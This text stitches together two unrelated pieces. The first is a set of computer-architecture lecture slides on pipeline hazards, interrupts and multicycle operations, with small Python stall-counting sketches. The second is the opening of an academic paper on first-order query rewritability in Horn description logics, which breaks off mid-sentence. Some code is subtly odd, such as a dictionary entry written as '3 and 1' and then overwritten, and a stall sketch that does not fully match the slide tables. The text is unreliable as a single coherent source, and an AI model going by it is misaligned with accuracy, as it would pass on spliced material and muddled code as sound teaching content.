- Compiler attempts to schedule code to fill delay slots
- Limits to this approach:
- Can only reorder between branches (5-6 instructions)
- Order of loads/stores difficult to swap (alias problems)
- Makes part of implementation architecturally visible
### Instruction Scheduling Example
```plaintext
a = b + c;
d = e – f;
```
How many cycles for each?
<table>
<thead>
<tr>
<th>No Scheduling Version</th>
<th>Scheduled Version</th>
</tr>
</thead>
<tbody>
<tr>
<td>LW Rb, b</td>
<td>LW Rb, b</td>
</tr>
<tr>
<td>LW Rc, c</td>
<td>LW Rc, c</td>
</tr>
<tr>
<td>ADD Ra, Rb, Rc</td>
<td>LW Re, e</td>
</tr>
<tr>
<td>SW a, Ra</td>
<td>ADD Ra, Rb, Rc</td>
</tr>
<tr>
<td>LW Re, e</td>
<td>LW Rf, f</td>
</tr>
<tr>
<td>LW Rf, f</td>
<td>SW a, Ra</td>
</tr>
<tr>
<td>SUB Rd, Re, Rf</td>
<td>SUB Rd, Re, Rf</td>
</tr>
<tr>
<td>SW d, Rd</td>
<td>SW d, Rd</td>
</tr>
</tbody>
</table>
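To answer the question above, a toy cycle counter, assuming full forwarding and exactly one stall cycle for a load immediately followed by a use of its destination:

```python
def pipeline_cycles(program, stages=5):
    """program: list of (op, dest, sources) tuples. Total cycles =
    n_instructions + (stages - 1) fill cycles + load-use stalls."""
    stalls = 0
    for prev, cur in zip(program, program[1:]):
        prev_op, prev_dest, _ = prev
        _, _, cur_srcs = cur
        if prev_op == "LW" and prev_dest in cur_srcs:
            stalls += 1  # load result not ready for the very next instruction
    return len(program) + (stages - 1) + stalls

unscheduled = [
    ("LW", "Rb", ()), ("LW", "Rc", ()),
    ("ADD", "Ra", ("Rb", "Rc")), ("SW", None, ("Ra",)),
    ("LW", "Re", ()), ("LW", "Rf", ()),
    ("SUB", "Rd", ("Re", "Rf")), ("SW", None, ("Rd",)),
]
scheduled = [
    ("LW", "Rb", ()), ("LW", "Rc", ()), ("LW", "Re", ()),
    ("ADD", "Ra", ("Rb", "Rc")), ("LW", "Rf", ()),
    ("SW", None, ("Ra",)), ("SUB", "Rd", ("Re", "Rf")),
    ("SW", None, ("Rd",)),
]
```

The unscheduled version pays two load-use stalls (14 cycles); the scheduled version pays none (12 cycles).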
Other Data Hazards: WARs
- **Write-After-Read (WAR) Hazards**
- Can’t happen in our simple 5-stage pipeline because writes always follow reads
- Preview: Late read, early write (auto-increment)
```
i DIV (R1), --, --
i+1 ADD --, R1+, --
```
- Preview: Out-of-Order reads (OOO-execution)
Other Data Hazards: WAWs
- **Write-After-Write (WAW) Hazards**
- Can’t happen in our simple 5-stage pipeline because only one writeback stage (ALU ops go through MEM stage)
- Preview: Slow operation followed by fast operation
```
i   DIVF F0, --, --
i+1 BFPT --, --, --
i+2 ADDF F0, --, --
```
- Also cache misses (they can return at odd times)
- **What about RARs?**
Control Hazards
- In base pipeline, branch outcome not known until MEM
- Simple solution – stall until outcome is known
- Length of control hazard is branch delay
- In this simple case, it is 3 cycles (assume 10% cond. branches)
- $CPI_{Real} = CPI_{Ideal} + CPI_{Stall} = 1.0 + 3 \text{ cycles} \times .1 = 1.3$
Control Hazards: Solutions Fast Branch Resolution
• Performance penalty could be more than 30%
• Deeper pipelines, some code is very branch heavy
• Fast Branch Resolution
• Adder in ID for PC + immediate targets
• Only works for simple conditions (compare to 0)
• Comparing two register values could be too slow
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Branch Instr.</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Instr +1</td>
<td></td>
<td>stall</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>Instr +2</td>
<td></td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
</tbody>
</table>
Control Hazards: Branch Characteristics
- Integer Benchmarks: 14-16% instructions are conditional branches
- FP: 3-12%
- On Average:
- 67% of conditional branches are “taken”
- 60% of forward branches are taken
- 85% of backward branches are taken
- Why?
Control Hazards: Solutions
1. Stall Pipeline
- Simple, No backing up, No Problems with Exceptions
2. Assume not taken
- Speculation requires back-out logic:
- What about exceptions, auto-increment, etc
- Bets the “wrong way”
3. Assume taken
- Doesn’t help in simple pipeline! (don’t know target)
4. Delay Branches
- Can help a bit… we’ll see pro’s and con’s soon
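The branch statistics above make it easy to compare options 1 and 2 numerically. A rough sketch using the integer-benchmark numbers from the previous slide (14% conditional branches, 67% taken) and the 3-cycle delay; the blended-CPI model is my own back-of-envelope, not a slide result:

```python
# Expected CPI under two strategies: always stall, vs. predict not-taken
# (pay the delay only when the branch is actually taken).
branch_freq = 0.14   # integer benchmarks: 14% conditional branches
frac_taken = 0.67    # 67% of conditional branches are taken
delay = 3            # branch resolved in MEM: 3-cycle delay

cpi_stall = 1.0 + branch_freq * delay                    # always pay
cpi_not_taken = 1.0 + branch_freq * frac_taken * delay   # pay only if taken
print(round(cpi_stall, 3), round(cpi_not_taken, 3))
```

Predicting not-taken bets the wrong way most of the time, yet still recovers about a third of the stall penalty.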
Control Hazards: Assume Not Taken
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Untaken Branch</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Instr +1</td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Instr +2</td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
</tr>
</tbody>
</table>
Looks good if we’re right!
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Taken Branch</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Instr +1</td>
<td></td>
<td>IF</td>
<td>flush</td>
<td>flush</td>
<td>flush</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Branch Target</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
</tr>
<tr>
<td>Branch Target +1</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
</tr>
</tbody>
</table>
Control Hazards: Branch Delay Slots
• Find one instruction that will be executed no matter which way the branch goes
• Now we don’t care which way the branch goes!
• Harder than it sounds to find instructions
• What to put in the slot (80% of the time)
• Instruction from before the branch (indep. of branch)
• Instruction from taken or not-taken path
– Always safe to execute? May need clean-up code (or nullifying branches)
– Helps if you go the right way
• Slots don’t help much with today’s machines
• Interrupts are more difficult (why? We’ll see soon)
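A quick estimate of what one delay slot buys, combining the 80% fill rate above with the branch frequency from the earlier slide; the model is a back-of-envelope sketch, not a slide result:

```python
# One branch delay slot: the slot cycle is wasted only when the compiler
# cannot fill it with useful work (about 20% of the time).
branch_freq = 0.14   # integer benchmarks: 14% conditional branches
fill_rate = 0.80     # slot filled usefully 80% of the time
cpi_penalty = branch_freq * (1 - fill_rate) * 1  # one slot cycle at risk
print(round(cpi_penalty, 3))  # about 0.028 extra CPI
```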
Consider the following deeply pipelined organization for a register-memory machine:
<table>
<thead>
<tr>
<th>Stage</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>IF1</td>
<td>Begin Instruction Fetch</td>
</tr>
<tr>
<td>IF2</td>
<td>End Instruction Fetch</td>
</tr>
<tr>
<td>ID</td>
<td>Instruction Decode, Register Read</td>
</tr>
<tr>
<td>ALU1</td>
<td>Address calculation (for branches and memory references); ALU operation for register-register type instructions; branch condition evaluation</td>
</tr>
<tr>
<td>MEM1</td>
<td>Begin memory access for memory instructions; write-back for register-register instructions.</td>
</tr>
<tr>
<td>MEM2</td>
<td>Complete memory access for memory instructions;</td>
</tr>
<tr>
<td>ALU2</td>
<td>Additional ALU cycle for register-memory operations.</td>
</tr>
<tr>
<td>WB</td>
<td>Writeback for register-memory operations; assume register file reads/writes work on split cycles as in the basic DLX pipeline.</td>
</tr>
</tbody>
</table>
Question: To avoid structural hazards, how many ALUs, Reg Read/Write ports are needed?
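One way to attack the question is to tally, per stage, which shared resources an in-flight instruction can occupy; in steady state every stage holds an instruction, so the total demand across stages is the number of units needed. The per-stage assignments below are my reading of the stage table (note that ID reads two source registers, which would additionally argue for two read ports within the read stage):

```python
from collections import Counter

# Hypothetical resource usage per stage for the 8-stage register-memory pipe.
stage_resources = {
    "IF1": [], "IF2": [],
    "ID":   ["reg_read"],    # register read
    "ALU1": ["alu"],         # address calc / reg-reg ALU op
    "MEM1": ["reg_write"],   # writeback for register-register instructions
    "MEM2": [],
    "ALU2": ["alu"],         # extra ALU cycle for register-memory ops
    "WB":   ["reg_write"],   # writeback for register-memory operations
}
demand = Counter(r for res in stage_resources.values() for r in res)
print(dict(demand))
```

Under these assumptions the pipeline needs two ALUs and two register write ports to avoid structural hazards.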
Pipelining Example
• How many stall cycles between instructions? (do not assume forwarding)
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R1, R2, R3</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Rx, R1, Ry</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Would forwarding help?
Pipelining Example
- How many stall cycles between instructions? (do not assume forwarding)
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R1, R2, R3</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Rx, R1, 10(Ry)</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
### Pipelining Example
- How many stall cycles between instructions? (do not assume forwarding)
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R1, R2, R3</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Rx, Ry, 10(R1)</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Pipelining Example
- How many stall cycles between instructions? (do not assume forwarding)
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>LW R1, 10(Rx)</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Ry, R1, Rz</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
### Pipelining Example
- **How many stall cycles between instructions? (do not assume forwarding)**
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R1, 10(Rx), Ry</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Rz, 40(R1), Ra</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
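All five examples reduce to one calculation: how far the producer's write stage is from the consumer's register read in ID. A sketch, assuming all register reads happen in ID and split-cycle register access lets a read share a cycle with the write:

```python
# Stages are 1-indexed; with the producer issued at cycle 1, its write
# happens in the cycle equal to its write stage's position.
STAGE = {"IF1": 1, "IF2": 2, "ID": 3, "ALU1": 4,
         "MEM1": 5, "MEM2": 6, "ALU2": 7, "WB": 8}

def stalls(write_stage, distance=1):
    """Stalls for a consumer `distance` instructions after the producer."""
    write_cycle = STAGE[write_stage]
    natural_id = STAGE["ID"] + distance   # consumer's unstalled ID cycle
    return max(0, write_cycle - natural_id)

print(stalls("MEM1"))  # reg-reg producer (e.g. ADD R1,R2,R3): 1 stall
print(stalls("WB"))    # load or reg-mem producer: 4 stalls
```

This is why the load-consumer pairs stall so much longer than the ADD-consumer pairs: memory instructions write back three stages later.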
Now for the hard stuff!
- Precise Interrupts
- What are interrupts?
- Why do they have to be precise?
- Must have well-defined state at interrupt
- All older instructions are complete
- All younger instructions have not started
- All interrupts are taken in program order
Interrupt Taxonomy
- Synchronous vs. Asynchronous (HW error, I/O)
- User Request (exception?) vs. Coerced
- User maskable vs. Nonmaskable (Ignorable)
- Within vs. Between Instructions
- Resume vs. Terminate
The difficult exceptions are resumable interrupts within instructions
- Save the state, correct the cause, restore the state, continue execution
# Interrupt Taxonomy
<table>
<thead>
<tr>
<th>Exception Type</th>
<th>Sync vs. Async</th>
<th>User Request Vs. Coerced</th>
<th>User mask vs. nonmask</th>
<th>Within vs. BetweenInsn</th>
<th>Resume vs. terminate</th>
</tr>
</thead>
<tbody>
<tr>
<td>I/O Device Req.</td>
<td>Async</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Between</td>
<td>Resume</td>
</tr>
<tr>
<td>Invoke O/S</td>
<td>Sync</td>
<td>User</td>
<td>Nonmask</td>
<td>Between</td>
<td>Resume</td>
</tr>
<tr>
<td>Tracing Instructions</td>
<td>Sync</td>
<td>User</td>
<td>Maskable</td>
<td>Between</td>
<td>Resume</td>
</tr>
<tr>
<td>Breakpoint</td>
<td>Sync</td>
<td>User</td>
<td>Maskable</td>
<td>Between</td>
<td>Resume</td>
</tr>
<tr>
<td>Arithmetic Overflow</td>
<td>Sync</td>
<td>Coerced</td>
<td>Maskable</td>
<td>Within</td>
<td>Resume</td>
</tr>
<tr>
<td>Page Fault (not in main m)</td>
<td>Sync</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Within</td>
<td>Resume</td>
</tr>
<tr>
<td>Misaligned Memory</td>
<td>Sync</td>
<td>Coerced</td>
<td>Maskable</td>
<td>Within</td>
<td>Resume</td>
</tr>
<tr>
<td>Mem. Protection Violation</td>
<td>Sync</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Within</td>
<td>Resume</td>
</tr>
<tr>
<td>Using Undefined Insns</td>
<td>Sync</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Within</td>
<td>Terminate</td>
</tr>
<tr>
<td>Hardware/Power Failure</td>
<td>Async</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Within</td>
<td>Terminate</td>
</tr>
</tbody>
</table>
Interrupts on Instruction Phases
- Exceptions can occur on many different phases
- However, exceptions are only handled in WB
- Why?
<table>
<thead>
<tr>
<th>Exception Type</th>
<th>IF</th>
<th>ID</th>
<th>EXE</th>
<th>MEM</th>
<th>WB</th>
</tr>
</thead>
<tbody>
<tr>
<td>Arithmetic Overflow</td>
<td></td>
<td></td>
<td>X</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Page Fault (not in main memory)</td>
<td>X</td>
<td></td>
<td></td>
<td>X</td>
<td></td>
</tr>
<tr>
<td>Misaligned Memory</td>
<td>X</td>
<td></td>
<td></td>
<td>X</td>
<td></td>
</tr>
<tr>
<td>Mem. Protection Violation</td>
<td>X</td>
<td></td>
<td></td>
<td>X</td>
<td></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Instruction Type</th>
<th>IF</th>
<th>ID</th>
<th>EX</th>
<th>MEM</th>
<th>WB</th>
</tr>
</thead>
<tbody>
<tr>
<td>load</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>add</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
How to take an exception?
1. Force a trap instruction on the next IF
2. Squash younger instructions (Turn off all writes (register/memory) for faulting instruction and all instructions that follow it)
3. Save all processor state after trap begins
- PC-chain, PSW, Condition Codes, trap condition
- PC-chain is length of the branch delay plus 1
4. Perform the trap/exception code then restart where we left off
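Steps 1 and 2 amount to partitioning the in-flight instructions at the faulting one. A toy sketch:

```python
# Precise-exception squash: keep (complete) everything older than the
# faulting instruction, squash its writes and those of everything younger.
def take_exception(pipeline, faulting_index):
    """pipeline: oldest-first list of instruction ids."""
    kept = pipeline[:faulting_index]      # older: allowed to complete
    squashed = pipeline[faulting_index:]  # faulting + younger: writes disabled
    return kept, squashed

kept, squashed = take_exception(["i1", "i2", "i3", "i4"], 2)
print(kept, squashed)  # ['i1', 'i2'] ['i3', 'i4']
```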
Summary of Exceptions
• Precise interrupts are a headache!
• All architected state must be precise
• Delayed branches
• Preview: Out-of-Order completion
• What if something writes-back earlier than the exception?
• Some machines punt on the problem
• Precise exceptions only for integer pipe
• Special “precise mode” used for debugging (10x slower)
Multicycle Operations
• Basic RISC pipeline
• All operations take 1 cycle
• Unfortunately, not the case in real processors
• FP add, Integer/FP Multiply can be 2-6 cycles
• 20-50 cycles for integer/FP divide, square root
• Cache misses can be hundreds of cycles
• Difficulties
• Hard to pipeline
• Differ in number of clock cycles
• Number of operands varies
Multicycle Operations
- For example, longer latency in FP unit
- EX may continue for as long as FP takes to finish
- Assume four separate ALUs
- Integer unit
- FP/Integer Multiplier
- FP Adder
- FP/Integer Divider
- Instruction stalls all instruction behind it if it cannot proceed to EX
Multicycle Terminology
- **Initiation Interval**
- Number of cycles that must elapse between issuing 2 operations of a given type.
- **Latency**
- Number of cycles between an instruction that *produces* a result and an instruction that *uses* the result.
<table>
<thead>
<tr>
<th>Functional Unit</th>
<th>Latency</th>
<th>Initiation Interval</th>
</tr>
</thead>
<tbody>
<tr>
<td>Integer ALU</td>
<td>0</td>
<td>1</td>
</tr>
<tr>
<td>Data Memory</td>
<td>1</td>
<td>1</td>
</tr>
<tr>
<td>FP Add</td>
<td>3</td>
<td>1</td>
</tr>
<tr>
<td>FP Multiply</td>
<td>6</td>
<td>1</td>
</tr>
<tr>
<td>FP Divide</td>
<td>24</td>
<td>24</td>
</tr>
</tbody>
</table>
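The table translates directly into stall counts. A small sketch (the dictionary keys are mine): a dependent instruction issued right after its producer waits `latency` cycles, and an independent instruction needing the same unit waits `initiation interval - 1` cycles:

```python
latency = {"int_alu": 0, "data_mem": 1, "fp_add": 3, "fp_mul": 6, "fp_div": 24}
initiation = {"int_alu": 1, "data_mem": 1, "fp_add": 3 and 1, "fp_mul": 1, "fp_div": 24}
initiation["fp_add"] = 1  # all units fully pipelined except the divider

# RAW stalls for a back-to-back dependent pair, and structural stalls for
# two independent operations contending for the same unit.
raw_stalls = {u: latency[u] for u in latency}
structural_stalls = {u: initiation[u] - 1 for u in initiation}
print(raw_stalls["fp_add"], structural_stalls["fp_div"])  # 3 23
```

The divider's initiation interval of 24 is what makes it effectively unpipelined: a second divide waits 23 cycles even with no data dependence.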
Multicycle Example
ADD R1, R2, R3 proceeds through IF, ID, EX, MEM, and WB as usual. DIVD F2, F2, F3 then occupies the unpipelined FP divider for 24 EX cycles (E1, E2, E3, ...). ADDD F10, F2, F8 has a RAW dependence on F2, so it stalls until the divide completes before it can enter the FP adder (A1 through A4), MEM, and WB.
[Figure: the EX stage is replaced by four parallel functional units (integer unit, FP/integer multiplier, FP adder, FP/integer divider), all feeding MEM and WB.]
New Issues
- Structural Hazards on non-pipelined units
- Register writes per cycle can be > 1 (what is the max?)
- WAW hazards are possible (are WARs?)
- Instructions complete out of order (what is the problem?)
- Longer latency ops (what is the problem?)
Structural Hazards
- FP Divide not pipelined
- Too much hardware needed
- Register Write port contention
- Can fix through replicating hardware (multiported register file)
- Can fix through stalls in ID
- Track WB usage in ID with WB reservation bits (shift register)
- Simplest scheme (all hardware is in ID)
- Can fix through stalls when entering MEM or WB
- Less hardware, but multiple stall points
WAW Hazards
- Why weren’t they a problem before?
<table>
<thead>
<tr>
<th>MULD F0, F4, F6</th>
<th>IF</th>
<th>ID</th>
<th>M1</th>
<th>M2</th>
<th>M3</th>
<th>M4</th>
<th>M5</th>
<th>M6</th>
<th>M7</th>
<th>MEM</th>
<th>WB</th>
</tr>
</thead>
<tbody>
<tr>
<td>...</td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>...</td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>ADDD F0, F4, F6</td>
<td></td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>A1</td>
<td>A2</td>
<td>A3</td>
<td>A4</td>
<td>MEM</td>
<td>WB</td>
</tr>
</tbody>
</table>
- Are they a problem?
- Why generate 2 writes without an intervening read?
- Branch delay slots, or an instruction that traps and then conflicts with the trap handler
- Could happen, so we must check
WAW Hazard Logic
- **Solutions:**
- Stall younger instruction writeback
- Intuitive solution, fairly simple implementation
- Squash older instruction writeback
- Why not? The younger will overwrite it anyway…
- No stalling/performance loss
- What about precise exceptions?
Multicycle: Summary of Hazards
- Three more checks must be performed in ID
- Check for structural hazards
- Make sure functional unit (FU) is not busy
- Make sure Reg Write port is available
- Check for RAW data hazard
- Wait until no source register is listed as a pending destination in a pipeline register whose result will not be available before this instruction needs it
- Check for WAW data hazards
- Determine if any instruction in A1...A4, M1...M7, or D has the same destination register as this instruction. If so, stall!
- Concepts are the same, logic is more complicated
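The three checks can be sketched as a single ID-stage predicate. A toy version, assuming we track the set of pending destination registers plus per-unit and per-cycle write-port reservations; the field names are illustrative, not from the slides:

```python
from collections import namedtuple

Insn = namedtuple("Insn", "unit dest srcs wb_cycle")

def can_issue(insn, busy_units, reserved_wb, pending_dests):
    if insn.unit in busy_units:                               # structural: FU busy
        return False
    if insn.wb_cycle in reserved_wb:                          # structural: WB port taken
        return False
    if any(s in pending_dests for s in insn.srcs):            # RAW hazard
        return False
    if insn.dest is not None and insn.dest in pending_dests:  # WAW hazard
        return False
    return True

# ADDD F10, F2, F8 while a DIVD writing F2 is still in flight: RAW, so stall.
addd = Insn("fp_add", "F10", ("F2", "F8"), 8)
print(can_issue(addd, set(), set(), {"F2"}))  # False
```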
Multicycle: Out of Order Completion
• What could go wrong here?
DIVD F0, F2, F4
ADDD F10, F10, F8
SUBD F12, F12, F14
• Solutions
1. Ignore the problem (1960s, early 70s)
2. Buffer the results (with forwarding) until all earlier ops complete
– History files, Future Files (Can be combined with out-of-order issue)
3. Imprecise exception with enough info to allow trap-handlers to clean up
4. Hybrid: Allow issue to continue only if all older instructions have cleared their exception points
First Order-Rewritability and Containment of Conjunctive Queries in Horn Description Logics
Meghyn Bienvenu, Peter Hansen, Carsten Lutz, Frank Wolter
HAL Id: lirmm-01367863
https://hal-lirmm.ccsd.cnrs.fr/lirmm-01367863
Submitted on 16 Sep 2016
HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers.
First Order-Rewritability and Containment of Conjunctive Queries in Horn Description Logics
Meghyn Bienvenu
CNRS, Univ. Montpellier, Inria, France
meghyn@lirmm.fr
Peter Hansen and Carsten Lutz
University of Bremen, Germany
{hansen, clu}@informatik.uni-bremen.de
Frank Wolter
University of Liverpool, UK
frank@csc.liv.ac.uk
Abstract
We study FO-rewritability of conjunctive queries in the presence of ontologies formulated in a description logic between $\mathcal{EL}$ and Horn-$\mathcal{SHIF}$, along with related query containment problems. Apart from providing characterizations, we establish complexity results ranging from \textsc{ExpTime} via \textsc{NExpTime} to \textsc{2ExpTime}, pointing out several interesting effects. In particular, FO-rewriting is more complex for conjunctive queries than for atomic queries when inverse roles are present, but not otherwise.
1 Introduction
When ontologies are used to enrich incomplete and heterogeneous data with a semantics and with background knowledge [Calvanese et al., 2009; Kontchakov et al., 2013; Bienvenu and Ortiz, 2015], efficient query answering is a primary concern. Since classical database systems are unaware of ontologies and implementing new ontology-aware systems that can compete with these would be a huge effort, a main approach used today is query rewriting: the user query $q$ and the ontology $O$ are combined into a new query $q_O$ that produces the same answers as $q$ under $O$ (over all inputs) and can be handed over to a database system for execution. Popular target languages for the query $q_O$ include SQL and Datalog. In this paper, we concentrate on ontologies formulated in description logics (DLs) and on rewritability into SQL, which we equate with first-order logic (FO).
FO-rewritability in the context of query answering under DL ontologies was first studied in [Calvanese et al., 2007]. Since FO-rewritings are not guaranteed to exist when ontologies are formulated in traditional DLs, the authors introduce the DL-Lite family of DLs specifically for the purpose of ontology-aware query answering using SQL database systems; in fact, the expressive power of DL-Lite is seriously restricted, in this way enabling existence guarantees for FO-rewritings. While DL-Lite is a successful family of DLs, there are many applications that require DLs with greater expressive power. The potential non-existence of FO-rewritings in this case is not necessarily a problem in practical applications. In fact, ontologies emerging from such applications typically use the available expressive means in a harmless way in the sense that efficient reasoning is often possible despite high worst-case complexity.
One might thus hope that, in practice, FO-rewritings can often be constructed also beyond DL-Lite.
This hope was confirmed in [Bienvenu et al., 2013; Hansen et al., 2015], which consider the case where ontologies are formulated in a DL of the $\mathcal{EL}$ family [Baader et al., 2005] and queries are atomic queries (AQs) of the form $A(x)$. To describe the obtained results in more detail, let an ontology-mediated query (OMQ) be a triple $(T, \Sigma, q)$ with $T$ a description logic TBox (representing an ontology), $\Sigma$ an ABox signature (the set of concept and role names that can occur in the data), and $q$ an actual query. Note that $T$ and $q$ might use symbols that do not occur in $\Sigma$; in this way, the TBox enriches the vocabulary available for formulating $q$. We use $(\mathcal{L}, Q)$ to denote the OMQ language that consists of all OMQs where $T$ is formulated in the description logic $\mathcal{L}$ and $q$ in the query language $Q$. In [Bienvenu et al., 2013], FO-rewritability is characterized in terms of the existence of certain tree-shaped ABoxes, covering a range of OMQ languages between $(\mathcal{EL}, \mathcal{AQ})$ and (Horn-$\mathcal{SHIF}$, $\mathcal{AQ}$). On the one hand, this characterization is used to clarify the complexity of deciding whether a given OMQ is FO-rewritable, which turns out to be \textsc{ExpTime}-complete. On the other hand, it provides the foundations for developing practically efficient and complete algorithms for computing FO-rewritings. The latter was explored further in [Hansen et al., 2015], where a novel type of algorithm for computing FO-rewritings of OMQs from $(\mathcal{EL}, \mathcal{AQ})$ is introduced, crucially relying on the previous results from [Bienvenu et al., 2013]. Its evaluation shows excellent performance and confirms the hope that, in practice, FO-rewritings almost always exist. In fact, rewriting fails in only 285 out of 10989 test cases.
A limitation of the discussed results is that they concern only AQs while in many applications, the more expressive conjunctive queries (CQs) are required. The aim of the current paper is thus to study FO-rewritability of OMQ languages based on CQs, considering ontology languages between $\mathcal{EL}$ and Horn-$\mathcal{SHIF}$. In particular, we provide characterizations of FO-rewritability in the required OMQ languages that are inspired by those in [Bienvenu et al., 2013] (replacing tree-shaped ABoxes with a more general form of ABox), and we analyze the complexity of FO-rewritability using an automata-based approach. While practically efficient algorithms are out of the scope of this article, we believe that our work also lays important ground for the subsequent development of such
algorithms. Our approach actually does allow the construction of rewritings, but it is not tailored towards doing that in a practically efficient way. It turns out that the studied FO-rewritability problems are closely related to OMQ containment problems as considered in [Bienvenu et al., 2012; Bourhis and Lutz, 2016]. In fact, being able to decide OMQ containment allows us to concentrate on connected CQs when deciding FO-rewritability, which simplifies technicalities considerably. For this reason, we also study characterizations and the complexity of query containment in the OMQ languages considered.
Our main complexity results are that FO-rewritability and containment are \textsc{ExpTime}-complete for OMQ languages between \((\mathcal{EL}, \mathcal{AQ})\) and \((\mathcal{EL}(\mathcal{F}_n), \mathcal{CQ})\) and \textsc{2ExpTime}-complete for OMQ languages between \((\mathcal{ELI}, \mathcal{CQ})\) and \((\text{Horn-}\mathcal{SHIF}, \mathcal{CQ})\). The lower bound for containment applies already when both OMQs share the same TBox. Replacing AQs with CQs thus results in an increase of complexity by one exponential in the presence of inverse roles (indicated by \(\mathcal{I}\)), but not otherwise. Note that the effect that inverse roles can increase the complexity of querying-related problems was known from expressive DLs of the \(\mathcal{ALC}\) family [Lutz, 2008], but it had not previously been observed for Horn DLs such as \(\mathcal{EL}\) and Horn-\(\mathcal{SHIF}\). While \textsc{2ExpTime} might appear to be very high complexity, we are fortunately also able to show that the runtime is double exponential only in the size of the actual queries 